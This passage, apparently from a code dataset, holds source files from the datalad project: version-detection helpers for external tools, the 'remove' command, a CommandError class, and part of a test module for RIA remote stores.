match.groups()[1],\n match.groups()[3])\n raise AssertionError(f\"no OpenSSH client found: {stdout}\")\n\n\ndef _get_system_ssh_version():\n \"\"\"Return version of the default on the system (in the PATH) ssh\n \"\"\"\n return _get_ssh_version(\"ssh\")\n\n\ndef _get_system_7z_version():\n \"\"\"Return version of 7-Zip\"\"\"\n out = _runner.run(\n ['7z'],\n protocol=StdOutErrCapture)\n # reporting in variable order across platforms\n # Linux: 7-Zip [64] 16.02\n # Windows: 7-Zip 19.00 (x86)\n pieces = out['stdout'].strip().split(':', maxsplit=1)[0].strip().split()\n for p in pieces:\n # the one with the dot is the version\n if '.' in p:\n return p\n lgr.debug(\"Could not determine version of 7z from stdout. %s\", out)\n\n\ndef get_rsync_version():\n\n # This does intentionally not query the version of rsync itself, but\n # that of the debian package it's installed with. Reason is in gh-7320,\n # which results in the need to detect a patched-by-ubuntu version of rsync\n # and therefore the package version, not the result of `rsync --version`.\n from datalad.utils import (\n get_linux_distribution,\n on_linux,\n )\n if on_linux:\n dist = get_linux_distribution()[0]\n if dist in ['debian', 'ubuntu']:\n out = _runner.run(['apt-cache', 'policy', 'rsync'],\n protocol=StdOutErrCapture)\n for line in out['stdout'].splitlines():\n parts = line.split()\n if parts[0] == 'Installed:':\n ver = LooseVersion(parts[1])\n break\n # If we have a debian package version, use this as rsync version.\n # Otherwise report what `rsync --version` itself has to say.\n if ver:\n return ver\n out = _runner.run(['rsync', '--version'], protocol=StdOutErrCapture)\n # Expected first line:\n # rsync version x protocol version y\n return LooseVersion(out['stdout'].splitlines()[0].split()[2])\n\n\nclass ExternalVersions(object):\n \"\"\"Helper to figure out/use versions of the externals (modules, cmdline tools, etc).\n\n To avoid collision between names of python modules and command line tools,\n prepend names for command line tools with `cmd:`.\n\n It maintains a dictionary of `distuil.version.LooseVersion`s to make\n comparisons easy. Note that even if version string conform the StrictVersion\n \"standard\", LooseVersion will be used. If version can't be deduced for the\n external, `UnknownVersion()` is assigned. If external is not present (can't\n be imported, or custom check throws exception), None is returned without\n storing it, so later call will re-evaluate fully.\n \"\"\"\n\n UNKNOWN = UnknownVersion()\n\n _CUSTOM = {\n 'cmd:annex': _get_annex_version,\n 'cmd:git': _get_git_version,\n 'cmd:bundled-git': _get_bundled_git_version,\n 'cmd:system-git': _get_system_git_version,\n 'cmd:ssh': _get_ssh_version,\n 'cmd:system-ssh': _get_system_ssh_version,\n 'cmd:7z': _get_system_7z_version,\n }\n # ad-hoc hardcoded map for relevant Python packages which do not provide\n # __version__ and are shipped by a differently named pypi package\n _PYTHON_PACKAGES = { # Python package -> distribution package\n 'github': 'pygithub',\n }\n _INTERESTING = (\n 'annexremote',\n 'platformdirs',\n 'boto',\n 'git',\n 'gitdb',\n 'humanize',\n 'iso8601',\n 'keyring',\n 'keyrings.alt',\n 'msgpack',\n 'patool',\n 'cmd:7z',\n 'requests',\n 'scrapy',\n )\n\n def __init__(self):\n self._versions = {}\n self.CUSTOM = self._CUSTOM.copy()\n self.INTERESTING = list(self._INTERESTING) # make mutable for `add`\n\n @classmethod\n def _deduce_version(klass, value):\n version = None\n\n # see if it is something containing a version\n for attr in ('__version__', 'version'):\n if hasattr(value, attr):\n version = getattr(value, attr)\n break\n\n # try importlib.metadata\n if version is None and hasattr(value, '__name__'):\n pkg_name = klass._PYTHON_PACKAGES.get(value.__name__, value.__name__)\n try:\n if sys.version_info < (3, 10):\n import importlib_metadata as im\n else:\n import importlib.metadata as im\n\n version = im.version(pkg_name)\n except Exception:\n pass\n\n # assume that value is the version\n if version is None:\n version = value\n\n # do type analysis\n if isinstance(version, (tuple, list)):\n # Generate string representation\n version = \".\".join(str(x) for x in version)\n elif isinstance(version, bytes):\n version = version.decode()\n elif isinstance(version, str):\n pass\n else:\n version = None\n\n if version:\n return LooseVersion(version)\n else:\n return klass.UNKNOWN\n\n def __getitem__(self, module):\n # when ran straight in its source code -- fails to discover nipy's version.. TODO\n #if module == 'nipy':\n # import pdb; pdb.set_trace()\n if not isinstance(module, str):\n modname = module.__name__\n else:\n modname = module\n module = None\n\n lgr.log(5, \"Requested to provide version for %s\", modname)\n # Early returns None so we do not store prev result for them\n # and allow users to install things at run time, so later check\n # doesn't pick it up from the _versions\n if modname not in self._versions:\n version = None # by default -- not present\n if modname in self.CUSTOM:\n try:\n version = self.CUSTOM[modname]()\n version = self._deduce_version(version)\n except Exception as exc:\n lgr.debug(\"Failed to deduce version of %s due to %s\"\n % (modname, CapturedException(exc)))\n return None\n else:\n if module is None:\n if modname not in sys.modules:\n try:\n module = __import__(modname)\n except ImportError:\n lgr.debug(\"Module %s seems to be not present\", modname)\n return None\n except Exception as exc:\n lgr.warning(\"Failed to import module %s due to %s\",\n modname, CapturedException(exc))\n return None\n else:\n module = sys.modules[modname]\n if module:\n version = self._deduce_version(module)\n self._versions[modname] = version\n\n return self._versions.get(modname, self.UNKNOWN)\n\n def keys(self, query=False):\n \"\"\"Return names of the known modules\n\n Parameters\n ----------\n query: bool, optional\n If True, we will first query all CUSTOM and INTERESTING entries\n to make sure we have them known.\n \"\"\"\n if query:\n [self[k] for k in chain(self.CUSTOM, self.INTERESTING)]\n return self._versions.keys()\n\n def __contains__(self, item):\n return bool(self[item])\n\n def add(self, name, func=None):\n \"\"\"Add a version checker\n\n This method allows third-party libraries to define additional checks.\n It will not add `name` if already exists. If `name` exists and `func`\n is different - it will override with a new `func`. Added entries will\n be included in the output of `dumps(query=True)`.\n\n Parameters\n ----------\n name: str\n Name of the check (usually a name of the Python module, or an\n external command prefixed with \"cmd:\")\n func: callable, optional\n Function to be called to obtain version information. This should be\n defined when checking the version of something that is not a Python\n module or when this class's method for determining the version of a\n Python module isn't sufficient.\n \"\"\"\n if func:\n func_existing = self.CUSTOM.get(name, None)\n was_known = False\n if func_existing and func_existing is not func:\n lgr.debug(\n \"Adding a new custom version checker %s for %s, \"\n \"old one: %s\", func, name, func_existing)\n was_known = name in self._versions\n self.CUSTOM[name] = func\n if was_known:\n # pop and query it again right away to possibly replace with a new value\n self._versions.pop(name)\n _ = self[name]\n elif name not in self.INTERESTING:\n self.INTERESTING.append(name)\n\n @property\n def versions(self):\n \"\"\"Return dictionary (copy) of versions\"\"\"\n return self._versions.copy()\n\n def dumps(self, indent=None, preamble=\"Versions:\", query=False):\n \"\"\"Return listing of versions as a string\n\n Parameters\n ----------\n indent: bool or str, optional\n If set would instruct on how to indent entries (if just True, ' '\n is used). Otherwise returned in a single line\n preamble: str, optional\n What preamble to the listing to use\n query : bool, optional\n To query for versions of all \"registered\" custom externals, so to\n get those which weren't queried for yet\n \"\"\"\n if indent and (indent is True):\n indent = ' '\n items = [\"%s=%s\" % (k, self._versions[k]) for k in sorted(self.keys(query=query))]\n out = \"%s\" % preamble if preamble else ''\n if indent is not None:\n if preamble:\n preamble += linesep\n indent = ' ' if indent is True else str(indent)\n out += (linesep + indent).join(items) + linesep\n else:\n out += \" \" + ' '.join(items)\n return out\n\n def check(self, name, min_version=None, msg=\"\"):\n \"\"\"Check if an external (optionally of specified min version) present\n\n Parameters\n ----------\n name: str\n Name of the external (typically a Python module)\n min_version: str or version, optional\n Minimal version to satisfy\n msg: str, optional\n An additional message to include into the exception message\n\n Raises\n ------\n MissingExternalDependency\n if the external is completely missing\n OutdatedExternalDependency\n if the external is present but does not satisfy the min_version\n \"\"\"\n ver_present = self[name]\n if ver_present is None:\n raise MissingExternalDependency(\n name, ver=min_version, msg=msg)\n elif min_version and ver_present < min_version:\n raise OutdatedExternalDependency(\n name, ver=min_version, ver_present=ver_present, msg=msg)\n\n\nexternal_versions = ExternalVersions()\n" }, { "alpha_fraction": 0.5751628279685974, "alphanum_fraction": 0.5761577486991882, "avg_line_length": 39.350364685058594, "blob_id": "9ce746101ad62767df97f1f524be18e68daccc32", "content_id": "578cb90328f559385cea755e52617c1bc16c31d2", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11056, "license_type": "permissive", "max_line_length": 114, "num_lines": 274, "path": "/datalad/local/remove.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for removing dataset content\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nfrom os.path import lexists\nimport warnings\n\nfrom datalad.core.local.save import Save\nfrom datalad.core.local.status import get_paths_by_ds\nfrom datalad.distributed.drop import Drop\nfrom datalad.distribution.dataset import (\n datasetmethod,\n require_dataset,\n EnsureDataset,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n jobs_opt,\n save_message_opt,\n)\nfrom datalad.support.constraints import (\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.param import Parameter\nfrom datalad.utils import (\n ensure_list,\n rmtree,\n)\n\nlgr = logging.getLogger('datalad.local.remove')\n\n\n@build_doc\nclass Remove(Interface):\n \"\"\"Remove components from datasets\n\n Removing \"unlinks\" a dataset component, such as a file or subdataset, from\n a dataset. Such a removal advances the state of a dataset, just like adding\n new content. A remove operation can be undone, by restoring a previous\n dataset state, but might require re-obtaining file content and subdatasets\n from remote locations.\n\n This command relies on the 'drop' command for safe operation. By default,\n only file content from datasets which will be uninstalled as part of\n a removal will be dropped. Otherwise file content is retained, such that\n restoring a previous version also immediately restores file content access,\n just as it is the case for files directly committed to Git. This default\n behavior can be changed to always drop content prior removal, for cases\n where a minimal storage footprint for local datasets installations is\n desirable.\n\n Removing a dataset component is always a recursive operation. Removing a\n directory, removes all content underneath the directory too. If\n subdatasets are located under a to-be-removed path, they will be\n uninstalled entirely, and all their content dropped. If any subdataset\n can not be uninstalled safely, the remove operation will fail and halt.\n\n .. versionchanged:: 0.16\n More in-depth and comprehensive safety-checks are now performed by\n default.\n The ``if_dirty||--if-dirty`` argument is ignored, will be removed in\n a future release, and can be removed for a safe-by-default behavior. For\n other cases consider the ``reckless||--reckless`` argument.\n The ``save||--save`` argument is ignored and will be removed in a future\n release, a dataset modification is now always saved. Consider save's\n ``amend||--amend`` argument for post-remove fix-ups.\n The ``recursive||--recursive`` argument is ignored, and will be removed\n in a future release. Removal operations are always recursive, and the\n parameter can be stripped from calls for a safe-by-default behavior.\n\n .. deprecated:: 0.16\n The ``check||--check`` argument will be removed in a future release.\n It needs to be replaced with ``reckless||--reckless``.\n \"\"\"\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n metavar=\"DATASET\",\n doc=\"\"\"specify the dataset to perform remove from.\n If no dataset is given, the current working directory is used\n as operation context\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n path=Parameter(\n args=(\"path\",),\n metavar=\"PATH\",\n doc=\"path of a dataset or dataset component to be removed\",\n nargs=\"*\",\n constraints=EnsureStr() | EnsureNone()),\n drop=Parameter(\n args=(\"--drop\",),\n doc=\"\"\"which dataset components to drop prior removal. This\n parameter is passed on to the underlying drop operation as\n its 'what' argument.\"\"\",\n # we must not offer a 'nothing' which would bypass\n # the `drop()` call. The implementation completely\n # relies on `drop()` for all safety measures.\n # instead `drop(reckless=kill)` must be used to fast-kill\n # things\n constraints=EnsureChoice('datasets', 'all')),\n jobs=jobs_opt,\n message=save_message_opt,\n # XXX deprecate!\n save=Parameter(\n args=(\"--nosave\",),\n dest='save',\n action=\"store_false\",\n doc=\"\"\"DEPRECATED and IGNORED; use `save --amend` instead\"\"\"),\n recursive=Parameter(\n args=(\"--recursive\", '-r',),\n action='store_const',\n const=None,\n doc=\"\"\"DEPRECATED and IGNORED: removal is always a recursive\n operation\"\"\"),\n )\n # inherit some from Drop\n # if_dirty and check as deprecated\n for p in ('reckless', 'if_dirty', 'check',):\n _params_[p] = Drop._params_[p]\n\n _examples_ = [\n dict(text=\"Permanently remove a subdataset (and all further subdatasets contained in it) from a dataset\",\n code_py=\"remove(dataset='path/to/dataset', path='path/to/subds')\",\n code_cmd=\"datalad remove -d <path/to/dataset> <path/to/subds>\"),\n dict(text=\"Permanently remove a superdataset (with all subdatasets) from the filesystem\",\n code_py=\"remove(dataset='path/to/dataset')\",\n code_cmd=\"datalad remove -d <path/to/dataset>\"),\n dict(text=\"DANGER-ZONE: Fast wipe-out a dataset and all its subdataset, bypassing all safety checks\",\n code_py=\"remove(dataset='path/to/dataset', reckless='kill')\",\n code_cmd=\"datalad remove -d <path/to/dataset> --reckless kill\"),\n ]\n\n @staticmethod\n @datasetmethod(name='remove')\n @eval_results\n def __call__(\n path=None,\n *,\n dataset=None,\n drop='datasets',\n reckless=None,\n message=None,\n jobs=None,\n # deprecated below\n recursive=None,\n check=None,\n save=None,\n if_dirty=None):\n\n # deprecate checks\n if if_dirty is not None:\n warnings.warn(\n \"The `if_dirty` argument of `datalad remove` is ignored, \"\n \"it can be removed for a safe-by-default behavior. For \"\n \"other cases consider the `reckless` argument.\",\n DeprecationWarning)\n\n if save is not None:\n warnings.warn(\n \"The `save` argument of `datalad remove` is ignored. \"\n \"A dataset modification is always saved. Consider \"\n \"`save --amend` if post-remove fix-ups are needed.\",\n DeprecationWarning)\n\n if recursive is not None:\n warnings.warn(\n \"The `recursive` argument of `datalad remove` is ignored. \"\n \"Removal operations are always recursive, and the parameter \"\n \"can be stripped from calls for a safe-by-default behavior. \",\n DeprecationWarning)\n\n if check is not None:\n warnings.warn(\n \"The `check` argument of `datalad remove` is deprecated, \"\n \"use the `reckless` argument instead.\",\n DeprecationWarning)\n\n if check is False:\n if reckless is not None:\n raise ValueError(\n 'Must not use deprecated `check` argument, and new '\n '`reckless` argument together with `datalad remove`.')\n reckless = 'availability'\n\n refds = require_dataset(dataset, check_installed=True,\n purpose='remove')\n # same path resolution that drop will do\n paths_by_ds, errors = get_paths_by_ds(\n refds, dataset, ensure_list(path),\n # super-mode will readily tell us which datasets to\n # save as the end\n subdsroot_mode='super')\n\n drop_success = True\n for res in Drop.__call__(\n dataset=dataset,\n path=path,\n what=drop,\n reckless=reckless,\n recursive=True,\n recursion_limit=None,\n jobs=jobs,\n result_xfm=None,\n return_type='generator',\n result_renderer='disabled',\n # delegate error handling here\n on_failure='ignore'):\n if res.get('status') not in ('ok', 'notneeded'):\n drop_success = False\n yield res\n\n if not drop_success:\n # there will be 'rm -rf' below, so play safe\n lgr.debug('Observed drop failure, will not attempt remove')\n return\n\n for dpath, paths in paths_by_ds.items():\n for delpath in ([dpath] if paths is None else paths):\n if lexists(str(delpath)):\n # here we still have something around on the\n # filesystem. There is no need to fiddle with\n # Git, just wipe it out. A later save() will\n # act on it properly\n if delpath.is_dir():\n lgr.debug('Remove directory: %s', delpath)\n rmtree(delpath)\n # cannot use .exists() must forsee dead symlinks\n else:\n lgr.debug('Remove file: %s', delpath)\n delpath.unlink()\n continue\n else:\n # if we get here, there is nothing on the file system\n # anymore at this path. Either because the parent\n # dataset vanished already, or because we dropped a\n # dataset. `save()` will properly unregistered\n # from the parents at the end. nothing else to do\n pass\n\n if not refds.is_installed():\n # we already dropped the whole thing\n return\n\n for res in Save.__call__(\n dataset=dataset,\n path=path,\n # we might have removed the reference dataset by now, recheck\n message=message if message else '[DATALAD] removed content',\n return_type='generator',\n result_renderer='disabled',\n result_xfm=None,\n result_filter=None,\n on_failure='ignore'):\n if res.get('action') == 'delete':\n # normalize to previous remove results\n res['action'] = 'remove'\n yield res\n" }, { "alpha_fraction": 0.4883190989494324, "alphanum_fraction": 0.4903133809566498, "avg_line_length": 28.74576187133789, "blob_id": "7409b52b6840f910fb361b2cc85ed8e81e012d5d", "content_id": "232cf3ac54d54c4f03ffc8d9f47ba2e6586e64ca", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3510, "license_type": "permissive", "max_line_length": 87, "num_lines": 118, "path": "/datalad/runner/exception.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Exception raise on a failed runner command execution\n\"\"\"\nfrom __future__ import annotations\n\nimport logging\nimport os\nfrom collections import Counter\nfrom typing import (\n Any,\n Optional,\n)\n\nlgr = logging.getLogger('datalad.runner.exception')\n\n\nclass CommandError(RuntimeError):\n \"\"\"Thrown if a command call fails.\n\n Note: Subclasses should override `to_str` rather than `__str__` because\n `to_str` is called directly in datalad.cli.main.\n \"\"\"\n\n def __init__(\n self,\n cmd: str | list[str] = \"\",\n msg: str = \"\",\n code: Optional[int] = None,\n stdout: str | bytes = \"\",\n stderr: str | bytes = \"\",\n cwd: str | os.PathLike | None = None,\n **kwargs: Any,\n ) -> None:\n RuntimeError.__init__(self, msg)\n self.cmd = cmd\n self.msg = msg\n self.code = code\n self.stdout = stdout\n self.stderr = stderr\n self.cwd = cwd\n self.kwargs = kwargs\n\n def to_str(self, include_output: bool = True) -> str:\n from datalad.utils import (\n ensure_unicode,\n join_cmdline,\n )\n to_str = \"{}: \".format(self.__class__.__name__)\n cmd = self.cmd\n if cmd:\n to_str += \"'{}'\".format(\n # go for a compact, normal looking, properly quoted\n # command rendering if the command is in list form\n join_cmdline(cmd) if isinstance(cmd, list) else cmd\n )\n if self.code:\n to_str += \" failed with exitcode {}\".format(self.code)\n if self.cwd:\n # only if not under standard PWD\n to_str += \" under {}\".format(self.cwd)\n if self.msg:\n # typically a command error has no specific idea\n to_str += \" [{}]\".format(ensure_unicode(self.msg))\n\n if self.kwargs:\n to_str += \" [info keys: {}]\".format(\n ', '.join(self.kwargs.keys()))\n\n if 'stdout_json' in self.kwargs:\n to_str += _format_json_error_messages(\n self.kwargs['stdout_json'])\n\n if not include_output:\n return to_str\n\n if self.stdout:\n to_str += \" [out: '{}']\".format(ensure_unicode(self.stdout).strip())\n if self.stderr:\n to_str += \" [err: '{}']\".format(ensure_unicode(self.stderr).strip())\n\n return to_str\n\n def __str__(self) -> str:\n return self.to_str()\n\n\ndef _format_json_error_messages(recs: list[dict]) -> str:\n # there could be many, condense\n msgs: Counter[str] = Counter()\n for r in recs:\n if r.get('success'):\n continue\n msg = '{}{}'.format(\n ' {}\\n'.format(r['note']) if r.get('note') else '',\n '\\n'.join(r.get('error-messages', [])),\n )\n if 'file' in r or 'key' in r:\n msgs[msg] += 1\n\n if not msgs:\n return ''\n\n return '\\n>{}'.format(\n '\\n> '.join(\n '{}{}'.format(\n m,\n ' [{} times]'.format(n) if n > 1 else '',\n )\n for m, n in msgs.items()\n )\n )\n" }, { "alpha_fraction": 0.6040116548538208, "alphanum_fraction": 0.6130701899528503, "avg_line_length": 33.0501823425293, "blob_id": "1e22926c9c2ae9fdf1e87288684b24986e3c390e", "content_id": "932711d0c498ea79fee872f8f6ccc574fcdb3eb3", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27819, "license_type": "permissive", "max_line_length": 146, "num_lines": 817, "path": "/datalad/distributed/tests/test_ria_basics.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport logging\nimport stat\n\nfrom datalad.api import (\n Dataset,\n clone,\n create_sibling_ria,\n)\nfrom datalad.cmd import NoCapture\nfrom datalad.customremotes.ria_utils import (\n create_ds_in_store,\n create_store,\n get_layout_locations,\n)\nfrom datalad.distributed.ora_remote import (\n LocalIO,\n SSHRemoteIO,\n _sanitize_key,\n)\nfrom datalad.distributed.tests.ria_utils import (\n common_init_opts,\n get_all_files,\n populate_dataset,\n)\nfrom datalad.support.exceptions import (\n CommandError,\n IncompleteResultsError,\n)\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_false,\n assert_in,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_status,\n assert_true,\n has_symlink_capability,\n known_failure_windows,\n serve_path_via_http,\n skip_if_adjusted_branch,\n skip_if_no_network,\n skip_if_root,\n skip_ssh,\n skip_wo_symlink_capability,\n slow,\n swallow_logs,\n turtle,\n with_tempfile,\n)\nfrom datalad.utils import Path\n\n# Note, that exceptions to test for are generally CommandError since we are\n# talking to the special remote via annex.\n\n\n@with_tempfile\n@with_tempfile\ndef _test_initremote_basic(url, io, store, ds_path, link):\n\n ds_path = Path(ds_path)\n store = Path(store)\n link = Path(link)\n ds = Dataset(ds_path).create()\n populate_dataset(ds)\n\n init_opts = common_init_opts + ['url={}'.format(url)]\n\n # fails on non-existing storage location\n assert_raises(CommandError,\n ds.repo.init_remote, 'ria-remote', options=init_opts)\n # Doesn't actually create a remote if it fails\n assert_not_in('ria-remote',\n [cfg['name']\n for uuid, cfg in ds.repo.get_special_remotes().items()]\n )\n\n # fails on non-RIA URL\n assert_raises(CommandError, ds.repo.init_remote, 'ria-remote',\n options=common_init_opts + ['url={}'.format(store.as_uri())]\n )\n # Doesn't actually create a remote if it fails\n assert_not_in('ria-remote',\n [cfg['name']\n for uuid, cfg in ds.repo.get_special_remotes().items()]\n )\n\n # set up store:\n create_store(io, store, '1')\n # still fails, since ds isn't setup in the store\n assert_raises(CommandError,\n ds.repo.init_remote, 'ria-remote', options=init_opts)\n # Doesn't actually create a remote if it fails\n assert_not_in('ria-remote',\n [cfg['name']\n for uuid, cfg in ds.repo.get_special_remotes().items()]\n )\n # set up the dataset as well\n create_ds_in_store(io, store, ds.id, '2', '1')\n # now should work\n ds.repo.init_remote('ria-remote', options=init_opts)\n assert_in('ria-remote',\n [cfg['name']\n for uuid, cfg in ds.repo.get_special_remotes().items()]\n )\n assert_repo_status(ds.path)\n # git-annex:remote.log should have:\n # - url\n # - common_init_opts\n # - archive_id (which equals ds id)\n remote_log = ds.repo.call_git(['cat-file', 'blob', 'git-annex:remote.log'],\n read_only=True)\n assert_in(\"url={}\".format(url), remote_log)\n [assert_in(c, remote_log) for c in common_init_opts]\n assert_in(\"archive-id={}\".format(ds.id), remote_log)\n\n # re-configure with invalid URL should fail:\n assert_raises(\n CommandError,\n ds.repo.call_annex,\n ['enableremote', 'ria-remote'] + common_init_opts + [\n 'url=ria+file:///non-existing'])\n # but re-configure with valid URL should work\n if has_symlink_capability():\n link.symlink_to(store)\n new_url = 'ria+{}'.format(link.as_uri())\n ds.repo.call_annex(\n ['enableremote', 'ria-remote'] + common_init_opts + [\n 'url={}'.format(new_url)])\n # git-annex:remote.log should have:\n # - url\n # - common_init_opts\n # - archive_id (which equals ds id)\n remote_log = ds.repo.call_git(['cat-file', 'blob',\n 'git-annex:remote.log'],\n read_only=True)\n assert_in(\"url={}\".format(new_url), remote_log)\n [assert_in(c, remote_log) for c in common_init_opts]\n assert_in(\"archive-id={}\".format(ds.id), remote_log)\n\n # we can deal with --sameas, which leads to a special remote not having a\n # 'name' property, but only a 'sameas-name'. See gh-4259\n try:\n ds.repo.init_remote('ora2',\n options=init_opts + ['--sameas', 'ria-remote'])\n except CommandError as e:\n if 'Invalid option `--sameas' in e.stderr:\n # annex too old - doesn't know --sameas\n pass\n else:\n raise\n # TODO: - check output of failures to verify it's failing the right way\n # - might require to run initremote directly to get the output\n\n\n# TODO: Skipped due to gh-4436\n@known_failure_windows\n@skip_ssh\n@with_tempfile\ndef test_initremote_basic_sshurl(storepath=None):\n _test_initremote_basic(\n 'ria+ssh://datalad-test{}'.format(Path(storepath).as_posix()), \\\n SSHRemoteIO('datalad-test'), \\\n storepath,\n )\n\n\n# ora remote cannot handle windows file:// URLs\n@known_failure_windows\n@with_tempfile\ndef test_initremote_basic_fileurl(storepath=None):\n _test_initremote_basic(\n \"ria+{}\".format(Path(storepath).as_uri()),\n LocalIO(),\n storepath,\n )\n\n\n# https://github.com/datalad/datalad/issues/6160\n@known_failure_windows\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_initremote_basic_httpurl(storepath=None, storeurl=None):\n _test_initremote_basic(\n f\"ria+{storeurl}\",\n LocalIO(),\n storepath,\n )\n\n\n@with_tempfile(mkdir=True)\n@serve_path_via_http(use_ssl=True)\ndef test_initremote_basic_httpsurl(storepath=None, storeurl=None):\n _test_initremote_basic(\n f\"ria+{storeurl}\",\n LocalIO(),\n storepath,\n )\n\n\n@skip_wo_symlink_capability\n@known_failure_windows # see gh-4469\n@with_tempfile\n@with_tempfile\ndef _test_initremote_alias(host, ds_path, store):\n\n ds_path = Path(ds_path)\n store = Path(store)\n ds = Dataset(ds_path).create()\n populate_dataset(ds)\n\n if host:\n url = \"ria+ssh://{host}{path}\".format(host=host,\n path=store)\n else:\n url = \"ria+{}\".format(store.as_uri())\n init_opts = common_init_opts + ['url={}'.format(url)]\n\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n create_store(io, store, '1')\n # set up the dataset with alias\n create_ds_in_store(io, store, ds.id, '2', '1', 'ali')\n ds.repo.init_remote('ria-remote', options=init_opts)\n assert_in('ria-remote',\n [cfg['name']\n for uuid, cfg in ds.repo.get_special_remotes().items()]\n )\n assert_repo_status(ds.path)\n assert_true(io.exists(store / \"alias\" / \"ali\"))\n\n\ndef test_initremote_alias():\n\n # TODO: Skipped due to gh-4436\n known_failure_windows(skip_ssh(_test_initremote_alias))('datalad-test')\n _test_initremote_alias(None)\n\n\n\n@known_failure_windows # see gh-4469\n@with_tempfile\n@with_tempfile\ndef _test_initremote_rewrite(host, ds_path, store):\n\n # rudimentary repetition of test_initremote_basic, but\n # with url.<base>.insteadOf config, which should not only\n # be respected, but lead to the rewritten URL stored in\n # git-annex:remote.log\n\n ds_path = Path(ds_path)\n store = Path(store)\n ds = Dataset(ds_path).create()\n populate_dataset(ds)\n assert_repo_status(ds.path)\n\n url = \"mystore:\"\n init_opts = common_init_opts + ['url={}'.format(url)]\n\n if host:\n replacement = \"ria+ssh://{host}{path}\".format(host=host,\n path=store)\n else:\n replacement = \"ria+{}\".format(store.as_uri())\n\n ds.config.set(\"url.{}.insteadOf\".format(replacement), url, scope='local')\n\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n create_store(io, store, '1')\n create_ds_in_store(io, store, ds.id, '2', '1')\n\n # run initremote and check what's stored:\n ds.repo.init_remote('ria-remote', options=init_opts)\n assert_in('ria-remote',\n [cfg['name']\n for uuid, cfg in ds.repo.get_special_remotes().items()]\n )\n # git-annex:remote.log should have:\n # - rewritten url\n # - common_init_opts\n # - archive_id (which equals ds id)\n remote_log = ds.repo.call_git(['cat-file', 'blob', 'git-annex:remote.log'],\n read_only=True)\n assert_in(\"url={}\".format(replacement), remote_log)\n [assert_in(c, remote_log) for c in common_init_opts]\n assert_in(\"archive-id={}\".format(ds.id), remote_log)\n\n\ndef test_initremote_rewrite():\n # TODO: Skipped due to gh-4436\n known_failure_windows(skip_ssh(_test_initremote_rewrite))('datalad-test')\n _test_initremote_rewrite(None)\n\n\n@known_failure_windows # see gh-4469\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef _test_remote_layout(host, dspath, store, archiv_store):\n\n dspath = Path(dspath)\n store = Path(store)\n archiv_store = Path(archiv_store)\n ds = Dataset(dspath).create()\n populate_dataset(ds)\n assert_repo_status(ds.path)\n\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n if host:\n store_url = \"ria+ssh://{host}{path}\".format(host=host,\n path=store)\n arch_url = \"ria+ssh://{host}{path}\".format(host=host,\n path=archiv_store)\n else:\n store_url = \"ria+{}\".format(store.as_uri())\n arch_url = \"ria+{}\".format(archiv_store.as_uri())\n\n create_store(io, store, '1')\n\n # TODO: Re-establish test for version 1\n # version 2: dirhash\n create_ds_in_store(io, store, ds.id, '2', '1')\n\n # add special remote\n init_opts = common_init_opts + ['url={}'.format(store_url)]\n ds.repo.init_remote('store', options=init_opts)\n\n # copy files into the RIA store\n ds.push('.', to='store')\n\n # we should see the exact same annex object tree\n dsgit_dir, archive_dir, dsobj_dir = \\\n get_layout_locations(1, store, ds.id)\n store_objects = get_all_files(dsobj_dir)\n local_objects = get_all_files(ds.pathobj / '.git' / 'annex' / 'objects')\n assert_equal(len(store_objects), 4)\n\n if not ds.repo.is_managed_branch():\n # with managed branches the local repo uses hashdirlower instead\n # TODO: However, with dataset layout version 1 this should therefore\n # work on adjusted branch the same way\n # TODO: Wonder whether export-archive-ora should account for that and\n # rehash according to target layout.\n assert_equal(sorted([p for p in store_objects]),\n sorted([p for p in local_objects])\n )\n\n if not io.get_7z():\n raise SkipTest(\"No 7z available in RIA store\")\n\n # we can simply pack up the content of the remote into a\n # 7z archive and place it in the right location to get a functional\n # archive remote\n\n create_store(io, archiv_store, '1')\n create_ds_in_store(io, archiv_store, ds.id, '2', '1')\n\n whereis = ds.repo.whereis('one.txt')\n dsgit_dir, archive_dir, dsobj_dir = 